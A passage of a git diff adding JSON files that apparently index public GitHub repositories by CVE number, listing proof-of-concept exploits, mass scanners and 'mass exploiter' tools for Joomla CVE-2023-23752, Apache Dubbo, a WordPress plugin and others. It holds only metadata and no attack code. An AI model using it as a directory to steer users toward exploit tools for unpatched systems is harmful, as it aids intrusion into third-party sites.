a/2023/CVE-2023-23488.json b/2023/CVE-2023-23488.json new file mode 100644 index 0000000000..1db41de9f2 --- /dev/null +++ b/2023/CVE-2023-23488.json @@ -0,0 +1,64 @@ +[ + { + "id": 596406519, + "name": "CVE-2023-23488-PoC", + "full_name": "long-rookie\/CVE-2023-23488-PoC", + "owner": { + "login": "long-rookie", + "id": 74786634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74786634?v=4", + "html_url": "https:\/\/github.com\/long-rookie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/long-rookie\/CVE-2023-23488-PoC", + "description": "Unauthenticated SQL Injection - Paid Memberships Pro < 2.9.8 (WordPress Plugin)", + "fork": false, + "created_at": "2023-02-02T05:28:09Z", + "updated_at": "2023-02-01T03:44:12Z", + "pushed_at": "2023-01-24T18:33:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 650732350, + "name": "CVE-2023-23488-pmpro-2.8", + "full_name": "cybfar\/CVE-2023-23488-pmpro-2.8", + "owner": { + "login": "cybfar", + "id": 96472592, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96472592?v=4", + "html_url": "https:\/\/github.com\/cybfar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cybfar\/CVE-2023-23488-pmpro-2.8", + "description": "Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2023-06-07T17:30:25Z", + "updated_at": "2023-06-08T01:12:01Z", + "pushed_at": "2023-06-07T22:10:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23531.json b/2023/CVE-2023-23531.json new file mode 100644 index 0000000000..2f035b6e39 --- /dev/null +++ b/2023/CVE-2023-23531.json @@ -0,0 +1,33 @@ +[ + { + "id": 622392634, + "name": "MonkeyJB", + "full_name": "DarthOCE\/MonkeyJB", + "owner": { + "login": "DarthOCE", + "id": 85499155, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85499155?v=4", + "html_url": "https:\/\/github.com\/DarthOCE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DarthOCE\/MonkeyJB", + "description": "A fully functional untethered iOS 16-16-4 jailbreak using the CVE-2023-23531 vulnerability ", + "fork": false, + "created_at": "2023-04-02T01:03:13Z", + "updated_at": "2024-12-03T04:08:37Z", + "pushed_at": "2023-04-02T01:04:32Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23583.json b/2023/CVE-2023-23583.json new file mode 100644 index 0000000000..5110bff735 --- /dev/null +++ b/2023/CVE-2023-23583.json @@ -0,0 +1,33 @@ +[ + { + "id": 722159332, + "name": "CVE-2023-23583-Reptar-", + "full_name": "Mav3r1ck0x1\/CVE-2023-23583-Reptar-", + "owner": { + "login": "Mav3r1ck0x1", + "id": 55414177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55414177?v=4", + "html_url": "https:\/\/github.com\/Mav3r1ck0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mav3r1ck0x1\/CVE-2023-23583-Reptar-", + "description": "This script can help determine the CPU ID for the processor of your system, please note that I have not added every CPU ID to this script, edit as needed.", + "fork": false, + "created_at": "2023-11-22T15:02:49Z", + "updated_at": "2023-11-22T15:07:44Z", + "pushed_at": "2023-11-24T18:04:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23607.json b/2023/CVE-2023-23607.json new file mode 100644 index 0000000000..3c1f277148 --- /dev/null +++ b/2023/CVE-2023-23607.json @@ -0,0 +1,33 @@ +[ + { + "id": 815845980, + "name": "CVE-2023-23607", + "full_name": "Pylonet\/CVE-2023-23607", + "owner": { + "login": "Pylonet", + "id": 135266995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135266995?v=4", + "html_url": "https:\/\/github.com\/Pylonet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pylonet\/CVE-2023-23607", + "description": null, + "fork": false, + "created_at": "2024-06-16T10:50:32Z", + "updated_at": "2024-06-18T15:41:04Z", + "pushed_at": "2024-06-18T15:41:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23638.json b/2023/CVE-2023-23638.json new file mode 100644 index 0000000000..0786dfcd87 --- /dev/null +++ b/2023/CVE-2023-23638.json @@ -0,0 +1,95 @@ +[ + { + "id": 617427518, + "name": "Dubbo-RCE", + "full_name": "X1r0z\/Dubbo-RCE", + "owner": { + "login": "X1r0z", + "id": 28532286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28532286?v=4", + "html_url": "https:\/\/github.com\/X1r0z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X1r0z\/Dubbo-RCE", + "description": "PoC of Apache Dubbo CVE-2023-23638", + "fork": false, + "created_at": "2023-03-22T11:23:44Z", + "updated_at": "2024-05-20T10:43:33Z", + "pushed_at": "2024-01-29T02:38:52Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 639303406, + "name": "Apache-Dubbo-CVE-2023-23638-exp", + "full_name": "YYHYlh\/Apache-Dubbo-CVE-2023-23638-exp", + "owner": { + "login": "YYHYlh", + "id": 28374935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28374935?v=4", + "html_url": "https:\/\/github.com\/YYHYlh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YYHYlh\/Apache-Dubbo-CVE-2023-23638-exp", + "description": "Apache Dubbo (CVE-2023-23638)漏洞利用的工程化实践", + "fork": false, + "created_at": "2023-05-11T07:37:52Z", + "updated_at": "2024-11-13T09:22:35Z", + "pushed_at": "2023-08-08T02:30:25Z", + "stargazers_count": 218, + "watchers_count": 218, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 218, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 650918802, + "name": "CVE-2023-23638-Tools", + "full_name": "3yujw7njai\/CVE-2023-23638-Tools", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-23638-Tools", + "description": null, + "fork": false, + "created_at": "2023-06-08T05:14:01Z", + "updated_at": "2023-06-08T05:14:02Z", + "pushed_at": "2023-06-08T05:15:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2375.json b/2023/CVE-2023-2375.json new file mode 100644 index 0000000000..afbb75ea5a --- /dev/null +++ b/2023/CVE-2023-2375.json @@ -0,0 +1,33 @@ +[ + { + "id": 823381127, + "name": "HTB-Devvortex-CVE-2023-2375-PoC", + "full_name": "0x0jr\/HTB-Devvortex-CVE-2023-2375-PoC", + "owner": { + "login": "0x0jr", + "id": 166342298, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166342298?v=4", + "html_url": "https:\/\/github.com\/0x0jr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0jr\/HTB-Devvortex-CVE-2023-2375-PoC", + "description": "CVE-2023-23752 Unauthenticated Information Disclosure Showcase Using Devvortex From HTB.", + "fork": false, + "created_at": "2024-07-02T23:50:31Z", + "updated_at": "2024-07-03T00:46:26Z", + "pushed_at": "2024-07-03T00:46:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23752.json b/2023/CVE-2023-23752.json new file mode 100644 index 0000000000..f6c3a560fe --- /dev/null +++ b/2023/CVE-2023-23752.json @@ -0,0 +1,1490 @@ +[ + { + "id": 603288698, + "name": "CVE-2023-23752", + "full_name": "yusinomy\/CVE-2023-23752", + "owner": { + "login": "yusinomy", + "id": 93922728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93922728?v=4", + "html_url": "https:\/\/github.com\/yusinomy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yusinomy\/CVE-2023-23752", + "description": " Joomla! 未授权访问漏洞", + "fork": false, + "created_at": "2023-02-18T03:36:54Z", + "updated_at": "2023-02-20T06:40:56Z", + "pushed_at": "2023-02-18T03:40:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 603407349, + "name": "CVE-2023-23752", + "full_name": "Saboor-Hakimi\/CVE-2023-23752", + "owner": { + "login": "Saboor-Hakimi", + "id": 44523544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44523544?v=4", + "html_url": "https:\/\/github.com\/Saboor-Hakimi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Saboor-Hakimi\/CVE-2023-23752", + "description": "CVE-2023-23752 nuclei template", + "fork": false, + "created_at": "2023-02-18T12:19:24Z", + "updated_at": "2024-02-14T07:47:20Z", + "pushed_at": "2023-02-18T12:39:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604098295, + "name": "joomla_CVE-2023-23752", + "full_name": "Vulnmachines\/joomla_CVE-2023-23752", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/joomla_CVE-2023-23752", + "description": " Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.", + "fork": false, + "created_at": "2023-02-20T10:30:17Z", + "updated_at": "2023-10-14T07:30:50Z", + "pushed_at": "2023-02-20T10:43:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604431570, + "name": "CVE-2023-23752", + "full_name": "sw0rd1ight\/CVE-2023-23752", + "owner": { + "login": "sw0rd1ight", + "id": 44807635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44807635?v=4", + "html_url": "https:\/\/github.com\/sw0rd1ight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sw0rd1ight\/CVE-2023-23752", + "description": "Poc for CVE-2023-23752 (joomla CMS)", + "fork": false, + "created_at": "2023-02-21T03:26:58Z", + "updated_at": "2023-12-29T10:29:12Z", + "pushed_at": "2023-02-18T21:09:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 605359170, + "name": "CVE-2023-23752-poc", + "full_name": "wangking1\/CVE-2023-23752-poc", + "owner": { + "login": "wangking1", + "id": 94971285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94971285?v=4", + "html_url": "https:\/\/github.com\/wangking1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wangking1\/CVE-2023-23752-poc", + "description": "CVE-2023-23752 poc", + "fork": false, + "created_at": "2023-02-23T01:40:38Z", + "updated_at": "2023-02-23T01:48:23Z", + "pushed_at": "2023-02-23T01:44:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605362106, + "name": "joomla_CVE-2023-23752", + "full_name": "ibaiw\/joomla_CVE-2023-23752", + "owner": { + "login": "ibaiw", + "id": 86768711, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86768711?v=4", + "html_url": "https:\/\/github.com\/ibaiw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ibaiw\/joomla_CVE-2023-23752", + "description": "未授权访问漏洞", + "fork": false, + "created_at": "2023-02-23T01:52:02Z", + "updated_at": "2023-03-02T03:03:03Z", + "pushed_at": "2023-03-02T03:03:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 605405382, + "name": "CVE-2023-23752-Joomla", + "full_name": "ifacker\/CVE-2023-23752-Joomla", + "owner": { + "login": "ifacker", + "id": 26481367, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26481367?v=4", + "html_url": "https:\/\/github.com\/ifacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifacker\/CVE-2023-23752-Joomla", + "description": "CVE-2023-23752 Joomla 未授权访问漏洞 poc", + "fork": false, + "created_at": "2023-02-23T04:37:31Z", + "updated_at": "2023-02-28T06:32:30Z", + "pushed_at": "2023-02-23T07:04:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605829176, + "name": "CVE-2023-23752", + "full_name": "z3n70\/CVE-2023-23752", + "owner": { + "login": "z3n70", + "id": 39817707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39817707?v=4", + "html_url": "https:\/\/github.com\/z3n70", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3n70\/CVE-2023-23752", + "description": "simple program for joomla CVE-2023-23752 scanner for pentesting and educational purpose", + "fork": false, + "created_at": "2023-02-24T01:33:55Z", + "updated_at": "2024-06-11T18:01:48Z", + "pushed_at": "2023-02-24T04:45:36Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608227467, + "name": "CVE-2023-23752", + "full_name": "keyuan15\/CVE-2023-23752", + "owner": { + "login": "keyuan15", + "id": 56430812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56430812?v=4", + "html_url": "https:\/\/github.com\/keyuan15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keyuan15\/CVE-2023-23752", + "description": "Joomla 未授权访问漏洞 CVE-2023-23752", + "fork": false, + "created_at": "2023-03-01T15:28:24Z", + "updated_at": "2023-09-03T18:05:05Z", + "pushed_at": "2023-03-03T06:47:17Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 610760106, + "name": "CVE-2023-23752", + "full_name": "adriyansyah-mf\/CVE-2023-23752", + "owner": { + "login": "adriyansyah-mf", + "id": 72158292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72158292?v=4", + "html_url": "https:\/\/github.com\/adriyansyah-mf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adriyansyah-mf\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-03-07T12:32:17Z", + "updated_at": "2024-08-12T20:30:08Z", + "pushed_at": "2023-03-07T12:32:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611616344, + "name": "CVE-2023-23752", + "full_name": "GhostToKnow\/CVE-2023-23752", + "owner": { + "login": "GhostToKnow", + "id": 127384020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127384020?v=4", + "html_url": "https:\/\/github.com\/GhostToKnow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GhostToKnow\/CVE-2023-23752", + "description": "开源,go多并发批量探测poc,准确率高", + "fork": false, + "created_at": "2023-03-09T07:32:06Z", + "updated_at": "2023-03-10T13:33:53Z", + "pushed_at": "2023-03-10T13:34:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611619510, + "name": "CVE-2023-23752", + "full_name": "gibran-abdillah\/CVE-2023-23752", + "owner": { + "login": "gibran-abdillah", + "id": 70421698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70421698?v=4", + "html_url": "https:\/\/github.com\/gibran-abdillah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gibran-abdillah\/CVE-2023-23752", + "description": "Bulk scanner + get config from CVE-2023-23752", + "fork": false, + "created_at": "2023-03-09T07:42:03Z", + "updated_at": "2024-11-20T20:36:15Z", + "pushed_at": "2023-03-14T06:39:36Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-23752", + "exploit", + "joomla" + ], + "visibility": "public", + "forks": 7, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 612578612, + "name": "Joomla-CVE-2023-23752", + "full_name": "Jenderal92\/Joomla-CVE-2023-23752", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/Joomla-CVE-2023-23752", + "description": "python 2.7", + "fork": false, + "created_at": "2023-03-11T11:20:44Z", + "updated_at": "2023-03-11T11:29:18Z", + "pushed_at": "2023-03-11T11:29:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618403324, + "name": "exploit-CVE-2023-23752", + "full_name": "Acceis\/exploit-CVE-2023-23752", + "owner": { + "login": "Acceis", + "id": 34159431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34159431?v=4", + "html_url": "https:\/\/github.com\/Acceis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Acceis\/exploit-CVE-2023-23752", + "description": "Joomla! < 4.2.8 - Unauthenticated information disclosure", + "fork": false, + "created_at": "2023-03-24T11:50:16Z", + "updated_at": "2024-12-17T04:46:40Z", + "pushed_at": "2023-12-27T11:30:46Z", + "stargazers_count": 81, + "watchers_count": 81, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-23752", + "exploit", + "information-disclosure", + "joomla", + "vulnerability" + ], + "visibility": "public", + "forks": 17, + "watchers": 81, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 618717743, + "name": "CVE-2023-23752-Docker", + "full_name": "karthikuj\/CVE-2023-23752-Docker", + "owner": { + "login": "karthikuj", + "id": 59091280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59091280?v=4", + "html_url": "https:\/\/github.com\/karthikuj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karthikuj\/CVE-2023-23752-Docker", + "description": "Joomla Unauthorized Access Vulnerability (CVE-2023-23752) Dockerized", + "fork": false, + "created_at": "2023-03-25T06:18:46Z", + "updated_at": "2023-06-07T17:50:13Z", + "pushed_at": "2023-03-25T06:40:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-23752", + "joomla", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 619177803, + "name": "CVE-2023-23752", + "full_name": "0xNahim\/CVE-2023-23752", + "owner": { + "login": "0xNahim", + "id": 124348533, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124348533?v=4", + "html_url": "https:\/\/github.com\/0xNahim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xNahim\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-03-26T13:58:14Z", + "updated_at": "2024-09-01T23:45:38Z", + "pushed_at": "2023-03-26T18:42:49Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623676111, + "name": "CVE-2023-23752", + "full_name": "adhikara13\/CVE-2023-23752", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2023-23752", + "description": "Poc for CVE-2023-23752", + "fork": false, + "created_at": "2023-04-04T21:14:19Z", + "updated_at": "2024-08-06T16:36:13Z", + "pushed_at": "2023-04-04T21:28:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624413538, + "name": "Joomla-Scanner", + "full_name": "AkbarWiraN\/Joomla-Scanner", + "owner": { + "login": "AkbarWiraN", + "id": 75610273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75610273?v=4", + "html_url": "https:\/\/github.com\/AkbarWiraN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkbarWiraN\/Joomla-Scanner", + "description": "CVE-2023-23752", + "fork": false, + "created_at": "2023-04-06T12:15:50Z", + "updated_at": "2024-03-17T20:25:35Z", + "pushed_at": "2023-04-06T12:28:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625201230, + "name": "Scanner-CVE-2023-23752", + "full_name": "Ge-Per\/Scanner-CVE-2023-23752", + "owner": { + "login": "Ge-Per", + "id": 97132622, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97132622?v=4", + "html_url": "https:\/\/github.com\/Ge-Per", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ge-Per\/Scanner-CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-04-08T11:27:09Z", + "updated_at": "2024-01-18T19:11:27Z", + "pushed_at": "2023-06-12T10:20:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625551982, + "name": "CVE-2023-23752", + "full_name": "ThatNotEasy\/CVE-2023-23752", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-23752", + "description": "Perform With Mass Exploiter In Joomla 4.2.8.", + "fork": false, + "created_at": "2023-04-09T13:20:48Z", + "updated_at": "2024-08-12T20:30:44Z", + "pushed_at": "2023-07-24T22:22:00Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "joomla-cms", + "leaked-databases", + "masscan" + ], + "visibility": "public", + "forks": 8, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 654473257, + "name": "CVE-2023-23752", + "full_name": "Sweelg\/CVE-2023-23752", + "owner": { + "login": "Sweelg", + "id": 86879265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86879265?v=4", + "html_url": "https:\/\/github.com\/Sweelg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sweelg\/CVE-2023-23752", + "description": "Joomla未授权访问漏洞", + "fork": false, + "created_at": "2023-06-16T07:53:22Z", + "updated_at": "2023-07-01T14:47:47Z", + "pushed_at": "2023-06-16T08:27:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 670890725, + "name": "CVE-2023-23752", + "full_name": "MrP4nda1337\/CVE-2023-23752", + "owner": { + "login": "MrP4nda1337", + "id": 138918718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138918718?v=4", + "html_url": "https:\/\/github.com\/MrP4nda1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrP4nda1337\/CVE-2023-23752", + "description": "simple program for joomla scanner CVE-2023-23752 with target list", + "fork": false, + "created_at": "2023-07-26T04:33:46Z", + "updated_at": "2023-07-28T13:48:27Z", + "pushed_at": "2023-07-26T18:47:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 705283440, + "name": "CVE-2023-23752", + "full_name": "lainonz\/CVE-2023-23752", + "owner": { + "login": "lainonz", + "id": 73258312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73258312?v=4", + "html_url": "https:\/\/github.com\/lainonz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lainonz\/CVE-2023-23752", + "description": "Mass CVE-2023-23752 scanner", + "fork": false, + "created_at": "2023-10-15T15:30:14Z", + "updated_at": "2024-06-02T03:10:30Z", + "pushed_at": "2024-06-02T03:10:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707585637, + "name": "CVE-2023-23752", + "full_name": "yTxZx\/CVE-2023-23752", + "owner": { + "login": "yTxZx", + "id": 100921463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100921463?v=4", + "html_url": "https:\/\/github.com\/yTxZx", + "user_view_type": "public" + }, + "html_url": 